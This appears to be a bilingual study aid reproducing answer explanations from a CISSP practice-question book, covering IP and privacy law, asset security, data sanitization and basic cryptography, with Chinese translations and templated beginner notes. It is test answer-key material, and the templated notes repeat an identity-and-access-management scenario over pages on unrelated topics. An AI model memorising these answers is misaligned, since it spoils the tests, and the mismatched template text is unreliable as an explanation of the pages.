版权法是马修可用的唯一一种知识产权保护类型。 它仅涵盖马修所使用 的具体软件代码,不涵盖软件背后的过程或思想。 商标保护不适合这种情况, 因为它仅保护软件的名称和/或标志,而非其算法。 专利保护不适用于数学算 法。 马修无法寻求商业秘密保护,因为他计划在公开的技术期刊上发布该算 法。 8. D. 玛丽和乔应将他们的油料配方视为商业秘密。 只要他们不公开披露该 配方,就可以无限期地将其作为公司机密保留。 版权和专利保护均有有效期, 无法满足玛丽和乔的需求。 商标保护适用于名称和标志,在此情况下不适用。 9. C. 理查德的产品名称应受商标法保护。 在注册获批之前,他可以在名称 旁使用™符号,以告知他人该名称受商标法保护。 一旦申请获得批准,该 名称即成为注册商标,理查德便可开始使用®符号。 ©符号用于表示版权。 †符号与知识产权保护无关。 10. A. 1974年《隐私权法案》限制了政府机构在特定情况下使用公民向其披 露的信息的方式。 《电子通信隐私法》(ECPA)实施了防止电子窃听的保 障措施。 《健康保险可携性和责任法案》(HIPAA)规范了健康记录的保护 与共享。 《格拉姆‑里奇‑比利雷法案》要求金融机构保护客户记录。

11. D. 欧盟提供了可用来促进数据传输的标准合同条款。 在两家不同公司共享 数据的情况下,这是最佳选择。 如果数据在公司内部共享,绑定企业规则也是 一个选项。 欧盟/美国隐私盾协议曾是一个允许数据传输的安全港协议,但现 已无效。 隐私锁是一个虚构术语。 12. A. 《儿童在线隐私保护法》(COPPA)对收集幼儿信息的公司施加了严厉的 处罚。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

问责性:问责性要求能把行为绑定到具体主体。

标准:标准给出必须满足的最低要求。

日志:日志记录系统和用户活动,用于监控、审计和调查。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1478 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

问责依赖识别、认证、授权、审计和记账共同工作。

Minimum level、mandatory requirement 常对应 standard。

日志要保护完整性、时间同步和访问控制。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
问责性 问责性要求能把行为绑定到具体主体。
标准 标准给出必须满足的最低要求。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 85 / PDF P1479

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

without parental consent. COPPA states that this consent must be obtained from the parents of children younger than the age of 13 before any information is collected (other than basic information required to obtain that consent). 13. D. Although state data breach notification laws vary, they generally apply to Social Security numbers, driver's license numbers, state identification card numbers, credit/debit card numbers, and bank account numbers. These laws generally do not cover other identifiers, such as a student identification number. 14. B.

Organizations subject to HIPAA may enter into relationships with service providers as long as the provider's use of protected health information is regulated under a formal business associate agreement (BAA). The BAA makes the service provider liable under HIPAA. 15. B. Cloud services almost always include binding click-through license agreements that the user may have agreed to when signing up for the service. If that is the case, the user may have bound the organization to the terms of that agreement. This agreement does not need to be in writing. There is no indication that the user violated any laws. 16. B.

The Gramm–Leach–Bliley Act (GLBA) provides, among other things, regulations regarding the way financial institutions can handle private information belonging to their customers. 17. C. U.S. patent law provides for an exclusivity period of 20 years beginning at the time a utility patent application is submitted to the Patent and Trademark Office. 18. C. Ryan does not likely need to be concerned about HIPAA compliance because that law applies to healthcare organizations and Ryan works for a financial institution. Instead, he should be more concerned about compliance with the Gramm–Leach–Bliley Act (GLBA). The other concerns should all be part of Ryan's contract review. 19. C.

The Payment Card Industry Data Security Standard (PCI DSS) applies to organizations involved in storing, transmitting, and processing credit card information. 20. D. Copyright protection generally lasts for 70 years after the death of the last surviving author of the work.

中文直译 / 整理

未经父母同意。 COPPA规定,在收集任何信息之前(基本信息除外,这 些信息仅用于获取该同意),必须获得13岁以下儿童父母的同意。 13. D. 尽管各州的数据泄露通知法有所不同,但它们通常适用于社会安全号码、 驾驶执照号码、州身份证号码、信用卡/借记卡号码和银行账户号码。 这些法 律通常不涵盖其他标识符,例如学生身份证号码。 14. B. 受HIPAA约束的组织可以与服务提供商建立关系,前提是服务提供 商对受保护健康信息的使用受正式业务伙伴协议(BAA)的规范。 BAA使 服务提供商在HIPAA下承担责任。 15. B. 云服务几乎总是包含用户在注册服务时可能同意的具有约束力的点击 式许可协议。 如果是这种情况,用户可能已使组织受该协议条款的约束。 该 协议无需以书面形式签订。 没有迹象表明用户违反了任何法律。 16. B.《格拉姆‑利奇‑布利利法案》(GLBA)规定了金融机构处理客户私人 信息的方式等事项。 17. C. 美国专利法规定,实用新型专利申请提交至专利和商标局之日起享有 20年的独占期。

18. C. Ryan 很可能无需担心 HIPAA 合规问题,因为该法律适用于医疗保健 机构,而 Ryan 就职于金融机构。 他应更关注《格拉姆‑利奇‑布利利法案》 (GLBA)的合规要求。 其他担忧都应包含在 Ryan 的合同审查中。 19. C. 支付卡行业数据安全标准(PCI DSS)适用于涉及存储、传输和处理 信用卡信息的组织。 20. D. 版权保护通常持续至作品最后一位作者去世后70年。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

PCI DSS:PCI DSS 是支付卡行业数据安全标准。

标准:标准给出必须满足的最低要求。

入侵防御系统 IPS:IPS 可检测并主动阻断恶意流量。

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

信用卡/持卡人数据场景优先想到 PCI DSS。

Minimum level、mandatory requirement 常对应 standard。

IPS 放在线路中,误报可能影响可用性。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
PCI DSS PCI DSS 是支付卡行业数据安全标准。
标准 标准给出必须满足的最低要求。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
身份 身份是主体在系统中的标识。
学习单元 86 / PDF P1480

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

Chapter 5: Protecting Security of Assets 1. B. Data classifications provide strong protection against the loss of confidentiality and are the best choice of the available answers. Data labels and proper data handling are based on first identifying data classifications. Data degaussing methods apply only to magnetic media. 2. D. Backup media should be protected with the same level of protection afforded the data it contains, and using a secure off-site storage facility would ensure this. The media should be marked, but that won't protect it if it is stored in an unstaffed warehouse.

A copy of backups should be stored off-site to ensure availability if a catastrophe affects the primary location. If copies of data are not stored off-site or off-site backups are destroyed, security is sacrificed by risking availability. 3. B. Destruction is the final stage in the life cycle of backup media. Because the backup method is no longer using tapes, they should be destroyed. Degaussing and declassifying the tape is done if you plan to reuse it. Retention implies you plan to keep the media, but retention is not needed at the end of its life cycle. 4. C. The data owner is the person responsible for classifying data.

A data controller decides what data to process and directs the data processor to process the data. A data custodian protects the integrity and security of the data by performing day-to-day maintenance. Users simply access the data. 5. A. The data custodian is responsible for the tasks of implementing the protections defined by the security policy and senior management. A data controller decides what data to process and how. Data users are not responsible for implementing the security policy protections. Data processors control the processing of data and only do what the data controller tells them to do with the data. 6. D.

The company can implement a data collection policy of minimization to minimize the amount of data they collect and store. If they are selling digital products, they don't need the physical address. If they are reselling products to the same customers, they can use tokenization to save tokens that match the credit card data, instead of saving and storing credit card data. Anonymization techniques remove all personal data and make the data unusable for reuse on the website. Pseudonymization replaces data

中文直译 / 整理

第5章:保护资产安全 1. B. 数据分类提供了对机密性丢失的强有力保护,是现有选项中的最佳选 择。 数据标签和适当的数据处理基于首先识别数据分类。 数据消磁方法仅 适用于磁性介质。 2. D. 备份介质应受到与所含数据相同级别的保护,使用安全的异地存储设施 可确保这一点。 介质应进行标记,但如果存放在无人值守的仓库中,这无法 提供保护。 备份的副本应存放在异地,以确保在灾难影响主要位置时仍可使 用。 如果数据副本未存放在异地或异地备份被破坏,则安全性将因 Availability 风险而受损。 3. B. 销毁是备份介质生命周期的最后阶段。 由于备份方法不再使用磁带,因 此应销毁这些磁带。 如果计划重新使用磁带,则应进行消磁和降级处理。 保 留意味着您计划继续保存介质,但在生命周期结束时无需保留。 4. C. 数据所有者是负责对数据进行分类的人员。 数据控制者决定处理哪些 数据,并指导数据处理者进行数据处理。 数据保管者通过日常维护来保护数 据的完整性和安全性。 用户仅访问数据。 5. A. 数据保管者负责实施安全策略和高级管理层所定义的保护措施。 数据控 制者决定处理哪些数据以及如何处理。

数据使用者不负责实施安全策略的保 护措施。 数据处理者控制数据的处理,仅按数据控制者的指示操作数据。 6. D. 公司可以实施数据最小化收集策略,以减少所收集和存储的数据量。 如 果他们销售数字产品,则无需收集物理地址。 如果他们向同一客户转售产品, 可以使用令牌化技术保存与信用卡数据匹配的令牌,而不是保存和存储信用 卡数据。 匿名化技术会移除所有个人数据,使数据无法在网站上重新使用。 伪匿名化技术会替换数据

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

数据所有者:数据所有者决定数据分类、保护要求和访问规则。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

Owner 定规则,Custodian 执行保护。

Custodian 常是 IT/运维角色。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
数据所有者 数据所有者决定数据分类、保护要求和访问规则。
数据保管者 数据保管者按所有者要求实施备份、访问控制等保护。
政策 政策是高层原则,说明必须遵守什么。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
数据分类 数据分类按敏感度和价值给数据贴等级,决定保护强度。
学习单元 87 / PDF P1481

角色与职责:谁最终负责,谁执行保护

CISSP 很爱考 owner、custodian、senior manager 的责任边界。

教材原文段落

with pseudonyms or artificial identifiers. Although the process can be reversed, it is not necessary. 7. B. Security labeling identifies the classification of data such as sensitive, secret, and so on. Media holding sensitive data should be labeled. Similarly, systems that hold or process sensitive data should also be labeled. Many organizations require the labeling of all systems and media, including those that hold or process nonsensitive data. 8. B. A data subject is a person that can be identified by an identifier such as a name, identification number, or other PII. All of these answers refer to the General Data Protection Regulation (GDPR).

A data owner owns the data and has ultimate responsibility for protecting it. A data controller decides what data to process, the purpose of collecting data, and how it should be processed. A data processor processes the data for the data controller. 9. B. Personnel did not follow the record retention policy for the backups sent to the warehouse. The scenario states that administrators purge onsite emails older than six months to comply with the organization's security policy, but the leak was from emails sent over three years ago. Personnel should follow media destruction policies when the organization no longer needs the media, but the issue here is the data on the tapes.

Configuration management ensures that systems are configured correctly using a baseline, but this does not apply to backup media. Versioning applies to applications, not backup tapes. 10. D. Record retention policies define the amount of time to keep data, and laws or regulations often drive these policies. Data remanence is data remnants on media, and proper data destruction procedures remove data remnants. Laws and regulations do outline requirements for some data roles, but they don't specify requirements for the data user role. 11. D. Purging is the most reliable method of the given choices.

Purging overwrites the media with random bits multiple times and includes additional steps to ensure that data is removed. It ensures there isn't any data remanence. Erasing or deleting processes rarely remove the data from media but instead mark it for deletion. Solid-state drives (SSDs) do not have magnetic flux, so degaussing an SSD doesn't destroy data. 12. A. Overwriting the disks multiple times will remove existing data. This is called purging, and purged media can then be used again. Formatting the disks isn't secure because it doesn't typically remove the previously

中文直译 / 整理

使用化名或人工标识符。 尽管该过程可以逆转,但并非必要。 7. B. 安全标签用于标识数据的分类,例如敏感、机密等。 存储敏感数据的 介质应进行标记。 同样,存储或处理敏感数据的系统也应进行标记。 许多组 织要求对所有系统和介质进行标记,包括那些存储或处理非敏感数据的系统 和介质。 8. B. 数据主体是指可以通过姓名、身份证号或其他个人身份信息(PII)等 标识符识别的个人。 所有这些答案均涉及《通用数据保护条例》(GDPR)。 数据所有者拥有数据,并对保护数据负有最终责任。 数据控制者决定处理哪 些数据、收集数据的目的以及如何处理数据。 数据处理者代表数据控制者处 理数据。 9. B. 人员未遵守发送至仓库的备份数据的保留策略。 该场景指出,管理员为 遵守组织的安全策略,会清除本地超过六个月的电子邮件,但泄露的邮件是 三年前发送的。 当组织不再需要介质时,人员应遵循介质销毁策略,但此处 的问题在于磁带上的数据。 配置管理通过基线确保系统正确配置,但这不适 用于备份介质。 版本控制适用于应用程序,而非备份磁带。 10. D. 数据保留政策规定了数据的保存时间,而法律法规通常推动这些政策的 制定。

数据残余是指介质上的数据残留,而适当的数据销毁程序可清除这些数 据残余。 法律法规确实规定了某些数据角色的要求,但并未明确数据使用者角 色的要求。 11. D. 消除是最可靠的给定方法。 消除会多次用随机比特覆盖介质,并包含 额外步骤以确保数据被彻底移除,从而保证不存在任何数据残余。 擦除或删 除操作很少真正从介质中移除数据,而只是将其标记为可删除。 固态硬盘 (SSD)没有磁通量,因此对SSD进行消磁无法销毁数据。 12. A. 多次覆盖磁盘将清除现有数据。 这称为消除,消除后的介质可以再次使 用。 格式化磁盘并不安全,因为它通常不会移除先前

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:CISSP 很爱考 owner、custodian、senior manager 的责任边界。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

数据所有者:数据所有者决定数据分类、保护要求和访问规则。

NIST:NIST 提供美国常用安全标准、框架和指南。

政策:政策是高层原则,说明必须遵守什么。

程序:程序是一步一步怎么做。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“角色与职责:谁最终负责,谁执行保护”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Owner 定规则,Custodian 执行保护。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

Owner 决策,Custodian 执行,User 按授权使用。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
数据所有者 数据所有者决定数据分类、保护要求和访问规则。
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
数据所有者 数据所有者负责决定数据分类、访问规则和保护要求。
保留期限 保留期限规定数据、日志或记录要保存多久。
身份 身份是主体在系统中的标识。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 88 / PDF P1482

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

stored data. Deleting the files removes them from the directory but leaves remanent data on the disk that may be recovered with forensic tools. Defragmenting a disk optimizes it, but it doesn't remove data. 13. D. Systems with an EOS date that occurs in the following year should be a top priority for replacement. The EOS date is the date that the vendor will stop supporting a product. The EOL date is the date that a vendor stops producing and offering a product for sales but the vendor continues to support the product until the EOS date. Systems used for data loss prevention or to process sensitive data can remain in service. 14. D.

Purging memory buffers remove all remnants of data after a program has used it. Asymmetric encryption (along with symmetric encryption) protects data in transit or at rest. The data is already encrypted and stored in the database. Data loss prevention methods prevent unauthorized data loss but do not protect data in use. 15. A. Symmetric encryption methods protect data at rest, and data at rest is any data stored on media such as a server. Data in transit is data being transferred between two systems. Data in use is data in memory that is used by an application.

Steps are taken to protect data from the time it is created to the time it is destroyed, but this question isn't related to the data life cycle. 16. B. Scoping is a part of the tailoring process and refers to reviewing a list of security and privacy controls and selecting the controls that apply. Tokenization is the use of a token, such as a random string of characters, to replace other data and is unrelated to this question. Note that scoping focuses on the security of the system, and tailoring ensures that the selected controls align with the organization's mission.

If the database server needs to comply with external entities, it's appropriate to select a standard baseline provided by that entity. Imaging is done to deploy an identical configuration to multiple systems, but this is typically done after identifying security controls. 17. A. Tailoring refers to modifying a list of security controls to align with the organization's mission. The IT administrators identified a list of security controls to protect the web farm during the scoping steps. Sanitization methods (such as purging and destroying) help ensure that data cannot be recovered and is unrelated to this question.

Asset classification identifies the classification of assets based on the classification of data the assets hold or process. Minimization refers to

中文直译 / 整理

存储的数据。 删除文件会将其从目录中移除,但磁盘上仍会残留数据, 可能通过取证工具恢复。 磁盘碎片整理可优化磁盘,但不会删除数据。 13. D. 具有次年到期支持日期(EOS)的系统应优先更换。 EOS 日期是指供 应商停止对产品提供支持的日期。 EOL 日期是指供应商停止生产和销售该产 品的日期,但供应商会在 EOS 日期前继续提供支持。 用于数据防泄漏或处理 敏感数据的系统可继续使用。 14. D. 清除内存缓冲区是在程序使用后移除所有数据残留。 非对称加密(连 同对称加密)保护传输中或静态的数据。 数据已加密并存储在数据库中。 数 据防泄漏方法可防止未经授权的数据泄露,但无法保护使用中的数据。 15. A. 对称加密方法保护静态数据,而静态数据是指存储在服务器等介质上 的任何数据。 传输中的数据是指在两个系统之间传输的数据。 使用中的数据 是指应用程序在内存中使用的数据。 从数据创建到销毁的整个过程中都会采 取措施保护数据,但本题与数据生命周期无关。 16. B. 范围界定是定制过程的一部分,指审查安全和隐私控制列表并选择适用 的控制措施。 令牌化是指使用令牌(例如一串随机字符)替换其他数据,与 本题无关。

请注意,范围界定关注系统的安全性,而定制确保所选控制措施 与组织的使命相一致。 如果数据库服务器需要符合外部实体的要求,则应选 择该实体提供的标准基线。 镜像是为了将相同的配置部署到多个系统,但通 常是在确定安全控制措施之后进行的。 17. A. 定制是指修改安全控制列表以与组织的使命保持一致。 IT管理员在范 围界定阶段识别了一组安全控制措施,以保护Web农场。 数据清除方法(如 清除和销毁)有助于确保数据无法恢复,与本题无关。 资产分类是根据资产 所持有或处理的数据的分类来确定资产的分类。 最小化是指

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

加密:加密把内容变成未授权者看不懂的形式。

NIST:NIST 提供美国常用安全标准、框架和指南。

标准:标准给出必须满足的最低要求。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
NIST NIST 提供美国常用安全标准、框架和指南。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
非对称加密 非对称加密使用公钥/私钥对,便于密钥交换和签名,但速度慢。
学习单元 89 / PDF P1483

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

data collection. Organizations should collect and maintain only the data they need. 18. A. A cloud access security broker (CASB) is a software solution placed logically between users and cloud-based resources, and it can enforce security policies used in an internal network. Data loss prevention (DLP) systems attempt to detect and block data exfiltration. CASB systems typically include DLP capabilities. Digital rights management (DRM) methods attempt to provide copyright protection for copyrighted works. End of life (EOL) is generally a marketing term and indicates when a company stops producing and selling a product. 19. B.

Network-based data loss prevention (DLP) systems can scan outgoing data and look for specific keywords and/or data patterns. DLP systems can block these outgoing transmissions. Antimalware software detects malware. Security information and event management (SIEM) provides real-time analysis of events occurring on systems throughout an organization but doesn't necessarily scan outgoing traffic. Intrusion prevention systems (IPSs) scan incoming traffic to prevent unauthorized intrusions. 20. B, C, D. Persistent online authentication, automatic expiration, and a continuous audit trail are all methods used with digital rights management (DRM) technologies.

Virtual licensing isn't a valid term within DRM.

中文直译 / 整理

数据收集。 组织应仅收集和维护其所需的数据。 18. A. 云访问安全代理(CASB)是一种软件解决方案,逻辑上部署在用户与 基于云的资源之间,能够执行内部网络中使用的安全策略。 数据丢失防护( DLP)系统旨在检测并阻止数据外泄。 CASB 系统通常包含 DLP 功能。 数字 版权管理(DRM)方法旨在为受版权保护的作品提供版权保护。 生命周期结 束(EOL)通常是一个市场术语,表示公司停止生产和销售某一产品的时间。 19. B. 基于网络的数据丢失防护(DLP)系统可以扫描传出数据,查找特定 关键词和/或数据模式。 DLP 系统可以阻止这些传出传输。 反恶意软件软件用 于检测恶意软件。 安全信息和事件管理(SIEM)提供对组织内各系统上发生 的事件的实时分析,但不一定扫描传出流量。 入侵防御系统(IPS)扫描传入 流量以防止未经授权的入侵。 20. B、C、D。 持久在线身份验证、自动过期和持续审计跟踪都是数字版 权管理(DRM)技术中使用的方法。 虚拟授权不是DRM中的有效术语。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

审计:审计记录主体行为,用于追责、复盘和取证。

入侵防御系统 IPS:IPS 可检测并主动阻断恶意流量。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

没有日志和身份绑定,就很难问责。

IPS 放在线路中,误报可能影响可用性。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
审计 审计记录主体行为,用于追责、复盘和取证。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
身份 身份是主体在系统中的标识。
审计 审计检查控制是否存在、是否有效、是否符合要求。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 90 / PDF P1484

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

Chapter 6: Cryptography and Symmetric Key Algorithms 1. A, D. Keys must be long enough to withstand attack for as long as the data is expected to remain sensitive. They should not be generated in a predictable way but, rather, should be randomly generated. Keys should be securely destroyed when they are no longer needed and not indefinitely retained. Longer keys do indeed provide greater security against brute-force attacks. 2. A. Nonrepudiation prevents the sender of a message from later denying that they sent it. Confidentiality protects the contents of encrypted data from unauthorized disclosure. Integrity protects data from unauthorized modification.

Availability is not a goal of cryptography. 3. B. The strongest keys supported by the Advanced Encryption Standard are 256 bits. The valid AES key lengths are 128, 192, and 256 bits. 4. D. The Diffie–Hellman algorithm allows the secure exchange of symmetric encryption keys between two parties over an insecure channel. 5. A. Confusion and diffusion are two principles underlying most cryptosystems. Confusion occurs when the relationship between the plaintext and the key is so complicated that an attacker can't merely continue altering the plaintext and analyzing the resulting ciphertext to determine the key.

Diffusion occurs when a change in the plaintext results in multiple changes spread throughout the ciphertext. 6. B. B. Randy is aiming to achieve confidentiality with his AES-based cryptosystem. Confidentiality ensures that sensitive information is accessible only to those authorized to view it, which aligns with Randy's goal of preventing unauthorized access to the information. Nonrepudiation, on the other hand, prevents someone from denying an action, such as sending a message, which is not Randy's focus here. Authentication verifies the identity of the parties involved, and while important, it's not the primary goal of encrypting data to prevent unauthorized access.

Integrity ensures that the data has not been tampered with or altered, which, although crucial, is not the same as protecting the data from being read by unauthorized individuals.

中文直译 / 整理

第6章:密码学与对称密钥算法 1. A、D。 密钥必须足够长,以抵御数据预期保持敏感期间的攻击。 密钥不 应以可预测的方式生成,而应随机生成。 当密钥不再需要时,应安全地销 毁,而非无限期保留。 更长的密钥确实能提供更强的抗暴力破解安全性。 2. A。 不可否认性性防止消息发送者事后否认其发送行为。 机密性保护加密数 据的内容不被未授权披露。 完整性保护数据不被未授权修改。 可用性不是密 码学的目标。 3. B。 高级加密标准支持的最强密钥为256位。 有效的AES密钥长度为128位、 192位和256位。 4. D。 Diffie–Hellman算法允许两方在不安全的信道上安全地交换 对称加密密钥。 5. A。 混淆和扩散是大多数密码系统的基础原则。 混淆是指明文与密钥之间 的关系极为复杂,攻击者无法仅通过持续修改明文并分析所得密文来确定 密钥。 扩散是指明文的更改会导致密文中多个位置发生扩散性变化。 6. B. B. Randy 正致力于通过其基于 AES 的加密系统实现机密性。 机密性 确保敏感信息仅限授权人员访问,这与 Randy 防止未经授权访问信息的目 标一致。

而非否认性则用于防止某人否认其行为(例如发送消息),而这并 非 Randy 在此的关注点。 身份验证用于确认相关方的身份,虽然重要,但 并非加密数据以防止未经授权访问的主要目标。 完整性确保数据未被篡改或 更改,尽管至关重要,但这与防止未经授权的个人读取数据并不相同。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

